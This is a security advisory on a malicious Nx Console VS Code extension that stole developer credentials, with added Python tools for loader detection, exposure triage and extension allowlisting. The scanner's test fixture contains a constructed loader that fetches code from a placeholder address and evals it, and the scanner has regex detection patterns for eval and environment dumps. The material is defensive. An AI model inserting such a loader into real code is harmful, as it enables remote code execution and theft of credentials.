CISA Adds Nx Console Supply Chain Attack to KEV Catalog
CISA has added CVE-2026-48027 to its Known Exploited Vulnerabilities (KEV) catalog — an embedded malicious code vulnerability in Nx Console, the official VS Code extension for the Nx monorepo build system developed by Nrwl. The vulnerability reflects a supply chain attack in which a malicious version of the extension was published to the VS Code marketplace, harvesting developer credentials from disk and memory.
The inclusion in CISA's KEV catalog confirms active exploitation in the wild.
Vulnerability Details
| Detail | Value |
|---|---|
| CVE | CVE-2026-48027 |
| Severity | High |
| Type | Embedded Malicious Code / Supply Chain |
| Vendor | Nx (Nrwl) |
| Product | Nx Console (VS Code Extension) |
| CISA KEV Added | 2026-05-27 |
| Impact | Credential harvesting from disk and memory |
What Happened
The vulnerability stems from a supply chain compromise of the Nx Console VS Code extension — one of the most widely installed developer tools in the Nx ecosystem, used by teams building monorepos with Angular, React, Next.js, and other frameworks.
An attacker was able to publish a malicious version of Nx Console to the Visual Studio Code Extension Marketplace. This compromised version contained embedded malicious code that:
- Fetched an obfuscated payload from a remote attacker-controlled server upon extension activation
- Executed the payload within the VS Code extension host process, which has access to the developer's local filesystem and running processes
- Harvested credentials from multiple sources on disk (e.g., `.npmrc`, `.ssh/`, `~/.aws/credentials`, browser profile directories, `.env` files, git credential stores) and from memory (e.g., environment variables of running processes, clipboard contents)
- Exfiltrated the collected data to attacker infrastructure
The use of an obfuscated remote payload is a common technique to evade static analysis by marketplace security scanners — the malicious extension itself contains no immediately detectable harmful code, only a loader.
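The loader shape described above (unprompted activation, a network fetch, execution of whatever comes back) leaves a few static traces even when the payload itself is absent. The following is an added example, not code from the page, from Nrwl or from Microsoft: it reads each installed extension's package.json and bundled JavaScript and flags the combination of those three indicators. The indicator regexes are heuristics of my own choosing, the two extensions it scans are constructed fixtures written to a temporary directory, and nothing in them is ever executed. A hit is a reason to look closer, not proof of compromise, and a miss proves nothing, which is exactly why marketplace scanning is insufficient here.

```python
"""Heuristic triage of installed VS Code extensions for 'loader' indicators.

Added example (not from the page, Nrwl or Microsoft). Looks for an extension
that activates without user action, reaches out over the network and executes
what it receives. Each indicator alone is common in honest extensions; the
combination is what gets flagged. The fixtures are constructed below.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Activation events that run the extension with no user action.
BROAD_ACTIVATION = {"*", "onStartupFinished"}

# Heuristic indicators over JavaScript source text (my own choice of patterns).
INDICATORS = {
    "network": re.compile(r"\bhttps?\.(?:get|request)\s*\(|\bfetch\s*\("),
    "dynamic_exec": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.run\w*\("),
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "decode_blob": re.compile(r"""Buffer\.from\([^,]+,\s*['"](?:base64|hex)['"]\)"""),
    "env_dump": re.compile(r"process\.env\b(?!\.[A-Za-z_])"),  # whole environment, not one variable
}


def scan_extension(ext_dir: Path) -> Dict[str, object]:
    """Indicators for one installed extension (a <publisher>.<name>-<version> directory)."""
    manifest = json.loads((ext_dir / "package.json").read_text())
    activation = set(manifest.get("activationEvents", []))
    hits = {name: 0 for name in INDICATORS}
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(errors="replace")
        for name, rx in INDICATORS.items():
            hits[name] += len(rx.findall(text))
    broad = bool(activation & BROAD_ACTIVATION)
    return {
        "id": f"{manifest.get('publisher')}.{manifest.get('name')}",
        "version": manifest.get("version"),
        "broad_activation": broad,
        "hits": hits,
        # The loader shape: runs unprompted, fetches, then executes the result.
        "loader_shape": broad and hits["network"] > 0 and hits["dynamic_exec"] > 0,
    }


def scan_all(ext_root: Path) -> List[Dict[str, object]]:
    """Scan every extension directory under ext_root (normally ~/.vscode/extensions)."""
    return [scan_extension(d) for d in sorted(ext_root.iterdir())
            if (d / "package.json").is_file()]


def _write_extension(root: Path, publisher: str, name: str, version: str,
                     activation: List[str], main_js: str) -> None:
    """Write a constructed extension directory in the layout VS Code uses on disk."""
    ext = root / f"{publisher}.{name}-{version}"
    (ext / "out").mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps({
        "name": name, "publisher": publisher, "version": version,
        "activationEvents": activation, "main": "./out/main.js"}))
    (ext / "out" / "main.js").write_text(main_js)


def demo() -> Dict[str, Dict[str, object]]:
    """Constructed fixture: one plain extension and one with the loader shape (text only, never run)."""
    root = Path(tempfile.mkdtemp())
    _write_extension(root, "example", "honest-tool", "1.0.0", ["onCommand:honest.run"],
        "const vscode = require('vscode');\n"
        "exports.activate = (ctx) => ctx.subscriptions.push(\n"
        "  vscode.commands.registerCommand('honest.run', () => vscode.window.showInformationMessage('ok')));\n")
    # Constructed sample of the described technique; 203.0.113.10 is a documentation-only address.
    _write_extension(root, "example", "loader-tool", "2.0.1", ["*"],
        "const https = require('https');\n"
        "exports.activate = () => https.get('https://203.0.113.10/u', (res) => {\n"
        "  let b = ''; res.on('data', (d) => (b += d));\n"
        "  res.on('end', () => eval(Buffer.from(b, 'base64').toString()));\n"
        "});\n")
    return {r["id"]: r for r in scan_all(root)}


if __name__ == "__main__":
    for ext_id, r in demo().items():
        flag = "LOADER SHAPE" if r["loader_shape"] else "ok"
        print(f"{ext_id}@{r['version']}: {flag} {r['hits']}")
```

To run it against a real workstation, point `scan_all` at `~/.vscode/extensions` (or the equivalent for Cursor, VSCodium or a remote extension host). Minified bundles will inflate the `decode_blob` and `env_dump` counts, so read the flagged file rather than acting on the numbers alone.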
Attack Surface: Why VS Code Extensions Are High Risk
VS Code extensions run in the extension host, a Node.js process with the full privileges of the user running VS Code; there is no sandbox or permission model between an extension and the operating system:
- Extensions have direct filesystem access and can read any file the current user can read
- Extensions can spawn child processes and execute arbitrary system commands
- Extensions can read the environment variables of the extension host process, which inherits them from VS Code, and of any processes they spawn
- An extension whose activation events include `*` or `onStartupFinished` runs as soon as VS Code starts or a workspace is opened, without any prompt
- Marketplace publication is gated by automated scanning rather than human code review, and the Marketplace signature on a package shows that it was served by the Marketplace, not that its code is benign
This combination makes a malicious VS Code extension one of the most effective vectors for developer credential theft — a single installation can compromise cloud provider credentials, source code signing keys, package registry tokens, and SSH private keys simultaneously.
Affected Populations
Any developer who installed the compromised version of Nx Console during the window in which the malicious version was available on the marketplace should treat their workstation as potentially compromised. This particularly includes:
- Angular and Nx monorepo developers (Nx Console's primary audience)
- Teams using Angular CLI (Nx Console integrates deeply with Angular tooling)
- CI/CD pipeline operators who may have Nx Console installed in automated environments
- Enterprise development teams using Nx for large-scale frontend development
Remediation
Immediate Steps
- Uninstall Nx Console if the installed version is the compromised one, or if you cannot establish which version is installed; reinstall only a version listed as clean in Nrwl's official release notes
- Rotate all credentials accessible from the affected workstation:
  - npm and package registry tokens
  - AWS, GCP, Azure service account keys
  - GitHub/GitLab personal access tokens and SSH keys
  - `.npmrc` auth tokens
  - Any secrets stored in `.env` files in workspace directories
  - Any token exported in the environment of processes that were running, since environment variables were harvested from memory
- Audit outbound network connections from development machines during the window the malicious extension was available, looking for destinations that are not known publisher, registry or cloud endpoints
- If endpoint monitoring is in place, pull the extension host's activity for that window: processes it spawned, files it read under the credential paths above, and connections it opened
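The two questions the steps above turn on are which Nx Console version a workstation actually has and which of the listed credential stores were actually present for it to read. The following is an added example, not code from the page, from Nrwl or from Microsoft, that answers both from the installed-extensions directory and the home directory so the rotation list is driven by real exposure. Two things are assumptions, because the article gives neither: the Marketplace ID of Nx Console is taken to be `nrwl.angular-console`, and `KNOWN_CLEAN` is a placeholder to be filled from Nrwl's release notes. Browser profile paths are Linux defaults, and the fixture it runs on is constructed in a temporary directory.

```python
"""Workstation triage after the Nx Console advisory.

Added example (not from the page, Nrwl or Microsoft). Reports the installed
Nx Console version against a known-clean list and enumerates which of the
credential stores named in the article exist on this machine.
Assumptions: NX_CONSOLE_ID, KNOWN_CLEAN (placeholder), Linux browser paths.
"""
import json
import tempfile
from pathlib import Path
from typing import Dict, List

NX_CONSOLE_ID = "nrwl.angular-console"   # assumed Marketplace ID; confirm in the Marketplace
KNOWN_CLEAN = {"0.0.0-placeholder"}       # placeholder: fill from Nrwl's official release notes

# Credential stores named in the article, relative to the home directory.
HOME_STORES = [
    ".npmrc",
    ".ssh",
    ".aws/credentials",
    ".git-credentials",
    ".config/google-chrome",   # browser profile directories (Linux defaults)
    ".mozilla/firefox",
]


def installed_extensions(ext_root: Path) -> List[Dict[str, str]]:
    """Read every package.json under the extensions directory (default ~/.vscode/extensions)."""
    found = []
    for manifest in sorted(ext_root.glob("*/package.json")):
        data = json.loads(manifest.read_text())
        found.append({
            "id": f"{data.get('publisher', '?')}.{data.get('name', '?')}".lower(),
            "version": str(data.get("version", "?")),
            "path": str(manifest.parent),
        })
    return found


def nx_console_verdict(extensions: List[Dict[str, str]]) -> str:
    """'absent', 'known-clean <v>', or 'UNVERIFIED <v> ...'; treat UNVERIFIED as compromised."""
    for ext in extensions:
        if ext["id"] == NX_CONSOLE_ID:
            if ext["version"] in KNOWN_CLEAN:
                return f"known-clean {ext['version']}"
            return f"UNVERIFIED {ext['version']} at {ext['path']}"
    return "absent"


def exposed_stores(home: Path, workspaces: List[Path]) -> List[str]:
    """Credential stores present on disk; each maps to an item on the rotation list."""
    present = [str(home / rel) for rel in HOME_STORES if (home / rel).exists()]
    for ws in workspaces:
        # .env and .env.* under every workspace; review each, some are only templates
        present.extend(str(p) for p in sorted(ws.rglob(".env*")) if p.is_file())
    return present


def demo() -> Dict[str, object]:
    """Constructed fixture: a fake home with one Nx Console install and a few stores.

    The version string is invented for the fixture and says nothing about which
    real release was malicious.
    """
    home = Path(tempfile.mkdtemp())
    ext_root = home / ".vscode" / "extensions"
    nx = ext_root / "nrwl.angular-console-18.1.2"
    nx.mkdir(parents=True)
    (nx / "package.json").write_text(json.dumps(
        {"name": "angular-console", "publisher": "nrwl", "version": "18.1.2"}))
    (home / ".aws").mkdir()
    (home / ".aws" / "credentials").write_text("[default]\naws_access_key_id = CONSTRUCTED\n")
    (home / ".npmrc").write_text("//registry.npmjs.org/:_authToken=CONSTRUCTED\n")
    ws = home / "work" / "monorepo"
    (ws / "apps").mkdir(parents=True)
    (ws / "apps" / ".env").write_text("API_KEY=CONSTRUCTED\n")
    exts = installed_extensions(ext_root)
    return {
        "verdict": nx_console_verdict(exts),
        "exposed": exposed_stores(home, [home / "work"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real machine call `installed_extensions(Path.home() / ".vscode" / "extensions")` and `exposed_stores(Path.home(), [<your workspace roots>])`; anything `UNVERIFIED` goes on the breach track from the first bullet, and every path returned becomes a line on the rotation list.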
Longer-Term Extension Security
- Pin extension versions: install a vetted version explicitly with `code --install-extension <publisher>.<name>@<version>`; note that `.vscode/extensions.json` only records recommendations and cannot pin a version, so the pin has to be enforced through policy rather than through that file
- Restrict which extensions may be installed with VS Code's `extensions.allowed` setting, which can be pushed through enterprise device-management policy and can limit an extension to specific versions
- Disable auto-updates for VS Code extensions (`extensions.autoUpdate`: false) in sensitive development environments, so a pinned version is not silently replaced by the next one published
- Monitor extension host network activity: a build-tooling extension normally talks to a small, predictable set of hosts (its publisher's telemetry, update checks, language-server downloads), so connections outside that set warrant investigation
- Review all installed extensions against the CISA KEV catalog and vendor security advisories
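The controls above combine into a small settings policy. The following is an added example, not code from the page or from Microsoft: `WEAK` and `HARDENED` are settings.json fragments written as Python dicts, and `extension_permitted` is my reading of the documented semantics of `extensions.allowed` (a value of true, false, "stable", or a list of permitted versions; a key is either a full `publisher.name` id or a bare publisher; the most specific match wins; once the setting is present, anything unmatched is not allowed). Verify that reading against the documentation for the VS Code build you deploy. The Nx Console id `nrwl.angular-console` and every version number are assumptions.

```python
"""Extension policy check for VS Code.

Added example (not from the page or Microsoft). HARDENED applies the controls
in the list above: auto-update off and an extensions.allowed allowlist pinning
Nx Console to vetted versions. extension_permitted() mirrors my understanding
of the documented extensions.allowed semantics; confirm against the docs.
"""
from typing import Dict, List, Tuple

WEAK = {
    # Defaults: every newly published version reaches the workstation,
    # and anything on the Marketplace may be installed.
    "extensions.autoUpdate": True,
    "extensions.autoCheckUpdates": True,
}

HARDENED = {
    "extensions.autoUpdate": False,
    "extensions.autoCheckUpdates": False,
    "extensions.allowed": {
        "nrwl.angular-console": ["0.0.0-vetted"],  # pinned to versions you vetted (placeholder)
        "dbaeumer.vscode-eslint": "stable",          # stable releases only, no pre-release builds
        "example-corp": True,                         # an internal publisher, any extension (illustrative)
        "*": False,                                   # explicit: nothing else installs
    },
}


def extension_permitted(settings: Dict, ext_id: str, version: str,
                        pre_release: bool = False) -> Tuple[bool, str]:
    """Decide whether ext_id@version may be installed under these settings."""
    policy = settings.get("extensions.allowed")
    if policy is None:
        return True, "no extensions.allowed configured: anything installs"
    publisher = ext_id.split(".", 1)[0]
    for key in (ext_id, publisher, "*"):          # most specific key wins
        if key in policy:
            rule = policy[key]
            break
    else:
        return False, f"{ext_id} matches no entry in extensions.allowed"
    if rule is True:
        return True, f"allowed by entry '{key}'"
    if rule is False:
        return False, f"denied by entry '{key}'"
    if rule == "stable":
        return (not pre_release), f"entry '{key}' allows stable releases only"
    if isinstance(rule, list):
        return (version in rule), f"entry '{key}' pins versions {rule}"
    return False, f"unrecognised rule {rule!r} for '{key}'"


def audit_settings(settings: Dict) -> List[str]:
    """Findings against the controls listed above; an empty list means compliant."""
    findings = []
    if settings.get("extensions.autoUpdate", True) is not False:
        findings.append("extensions.autoUpdate is not false: a pinned version will be replaced")
    policy = settings.get("extensions.allowed")
    if policy is None:
        findings.append("extensions.allowed is not set: any Marketplace extension can be installed")
    else:
        for key, rule in policy.items():
            if "." in key and rule is True:
                findings.append(f"{key} is allowed at any version; pin a list of vetted versions")
    return findings


def demo() -> Dict[str, object]:
    """Run both fragments through the audit and a few install decisions."""
    return {
        "weak_findings": audit_settings(WEAK),
        "hardened_findings": audit_settings(HARDENED),
        "pinned_ok": extension_permitted(HARDENED, "nrwl.angular-console", "0.0.0-vetted"),
        "pinned_other": extension_permitted(HARDENED, "nrwl.angular-console", "9.9.9"),
        "unlisted": extension_permitted(HARDENED, "someone.random-tool", "1.0.0"),
        "prerelease": extension_permitted(HARDENED, "dbaeumer.vscode-eslint", "3.0.0", pre_release=True),
        "weak_anything": extension_permitted(WEAK, "someone.random-tool", "1.0.0"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point of pinning by version list rather than by publisher is that a compromised publisher account, which is what a Marketplace supply chain attack amounts to, can publish a new version but cannot make an already-vetted version string match a different package.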
Key Takeaways
- CISA KEV confirmation means this vulnerability is actively being exploited — treat any installation of the compromised version as a confirmed breach of that workstation
- Developer tools are a tier-1 supply chain target — a compromised IDE extension provides access to credentials for every service a developer touches
- Obfuscated remote payload fetching is a deliberate evasion tactic to bypass marketplace scanning — static security analysis of extension source is insufficient
- Credential rotation must be comprehensive — partial rotation after a developer workstation compromise leaves residual access for attackers